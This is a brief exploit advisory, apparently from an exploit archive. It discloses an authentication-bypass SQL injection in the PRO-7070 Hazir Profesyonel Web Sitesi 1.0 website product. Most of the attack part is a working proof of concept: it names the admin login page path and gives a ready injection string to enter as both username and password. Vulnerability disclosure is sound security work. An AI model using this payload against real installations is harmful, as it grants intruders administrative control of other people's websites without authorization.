PRO-7070 Hazir Profesyonel Web Sitesi 1.0 SQL Injection

PRO-7070 Hazir Profesyonel Web Sitesi version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.


MD5 | 791eab6baad5a9a9903848ffb987623d

# Exploit Title: PRO-7070 Hazır Profesyonel Web Sitesi 1.0 - Authentication Bypass
# Date: 2019-12-08
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.websitem.biz/hazir-site/pro-7070-hazir-mobil-tablet-uyumlu-web-sitesi
# Tested on: Kali Linux
# Version: 1.0
# CVE: N/A

----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/pass.asp
Username: '=' 'or'
Password: '=' 'or'

Related Posts